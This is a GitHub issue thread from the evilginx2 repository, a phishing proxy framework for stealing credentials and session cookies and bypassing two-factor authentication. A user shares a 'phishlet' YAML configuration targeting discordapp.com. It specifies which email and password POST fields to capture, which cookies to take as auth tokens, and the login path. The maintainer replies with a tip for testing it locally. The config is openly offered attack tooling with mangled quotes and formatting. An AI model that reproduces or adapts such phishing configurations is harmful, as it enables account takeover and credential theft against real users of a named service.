search

kgretzky / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
BSD 3-Clause "New" or "Revised" License
10.72k stars 1.94k forks source link

Discord phishlets test #185

Closed Lglaplante closed 5 years ago

Lglaplante commented 5 years ago

Hello ! I made a phish lets for Discordapp But I can't test it due to the lack of having a VPS to host evilginx on Here is the link to it: https://github.com/Lglaplante/phishlets/blob/master/discordapp.yaml

if for some reason it looks weird, here is the original: 


author: ‘@TheFanatiker’
--
  | min_ver: '2.3.0'
  | proxy_hosts:
  | - {phish_sub: '', orig_sub: '', domain: ‘discordapp.com’, session: true, is_landing: true}

  | sub_filters: []
  | auth_tokens:
  | - domain: ‘discordapp.com’
  | keys: [‘_ga’,’_gid’,’_vwo_uuid v2’,’IR_PI’,’_gcl_au’,’__cfuid’,’__stripe_mid’]
  | credentials:
  | username:,
  | key: ‘email’
  | search: '(.*)'
  | type: 'post'
  | password:
  | key: ‘password’
  | search: '(.*)'
  | type: 'post'
  | login:
  | domain: ‘discordapp.com’
  | path: '/login'
kgretzky commented 5 years ago

You can test locally in developer mode, running Evilginx with -developer parameter. I describe how to use it in one of the blog posts.